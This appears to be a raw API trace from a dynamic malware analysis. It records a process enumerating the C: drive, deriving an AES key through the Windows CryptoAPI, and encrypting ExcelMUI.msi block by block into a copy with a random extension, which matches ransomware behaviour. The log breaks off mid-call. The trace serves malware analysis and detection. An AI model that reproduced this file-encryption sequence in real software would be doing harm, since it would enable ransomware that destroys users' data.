0x1 [0119.517] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.517] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.517] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.517] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.517] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.517] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.517] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.517] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.517] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.517] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.517] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.517] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.517] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.518] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.518] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.518] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.518] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.518] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.518] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.518] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.519] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.519] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.519] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.519] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.519] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.519] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 0 [0119.519] FindClose (in: hFindFile=0x284d3a8 | out: hFindFile=0x284d3a8) returned 1 [0119.519] FindNextFileW (in: hFindFile=0x284d468, lpFindFileData=0x326ea18 | out: lpFindFileData=0x326ea18) returned 1 [0119.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr", cchWideChar=-1, lpMultiByteStr=0x326f520, cbMultiByte=260, lpDefaultChar=0x326ecff, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr", lpUsedDefaultChar=0x0) returned 8 [0119.519] FindNextFileW (in: hFindFile=0x284d468, lpFindFileData=0x326ea18 | out: lpFindFileData=0x326ea18) returned 1 [0119.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BOOTSECT.BAK", cchWideChar=-1, lpMultiByteStr=0x326f520, cbMultiByte=260, lpDefaultChar=0x326ecff, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BOOTSECT.BAK", lpUsedDefaultChar=0x0) returned 13 [0119.519] FindNextFileW (in: hFindFile=0x284d468, lpFindFileData=0x326ea18 | out: lpFindFileData=0x326ea18) returned 1 [0119.519] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 0x284d3a8 [0119.519] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.519] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.519] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 0 [0119.519] FindClose (in: hFindFile=0x284d3a8 | out: hFindFile=0x284d3a8) returned 1 [0119.520] FindNextFileW (in: hFindFile=0x284d468, lpFindFileData=0x326ea18 | out: lpFindFileData=0x326ea18) returned 1 [0119.520] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*", lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 0xffffffff [0119.520] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.520] FindNextFileW (in: hFindFile=0x284d468, lpFindFileData=0x326ea18 | out: lpFindFileData=0x326ea18) returned 1 [0119.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="hiberfil.sys", cchWideChar=-1, lpMultiByteStr=0x326f520, cbMultiByte=260, lpDefaultChar=0x326ecff, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hiberfil.sys", lpUsedDefaultChar=0x0) returned 13 [0119.521] FindNextFileW (in: hFindFile=0x284d468, lpFindFileData=0x326ea18 | out: lpFindFileData=0x326ea18) returned 1 [0119.521] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 0x284d3a8 [0119.521] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.521] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.521] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.521] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.617] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.617] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.617] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.617] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0x284d4e8 [0119.618] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.618] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0119.618] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0119.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ExcelLR.cab", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLR.cab", lpUsedDefaultChar=0x0) returned 12 [0119.618] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0119.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ExcelMUI.msi", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelMUI.msi", lpUsedDefaultChar=0x0) returned 13 [0119.619] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x340 [0119.620] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.VNE3fKaJ" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.vne3fkaj"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x344 [0119.621] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52128) returned 1 [0119.628] CryptCreateHash (in: hProv=0xa52128, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0119.630] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0119.631] CryptDeriveKey (in: hProv=0xa52128, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0119.634] GetFileSize (in: hFile=0x340, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x263e00 [0119.634] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.646] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.646] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.646] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.646] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.647] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.647] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.647] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.647] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.647] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.647] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.647] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.647] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.647] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.647] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.647] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.647] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.647] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.647] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.647] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.647] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.648] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.648] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.648] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.648] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.648] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.648] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.648] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.648] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.648] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.648] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.648] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.648] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.648] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.648] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.648] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.648] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.648] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.648] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.648] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.648] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.648] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.649] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.649] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.649] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.649] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.649] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.649] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.649] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.649] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.649] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.649] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.649] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.649] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.649] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.649] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.649] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.649] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.649] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.649] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.649] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.649] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.649] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.650] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.650] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.650] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, 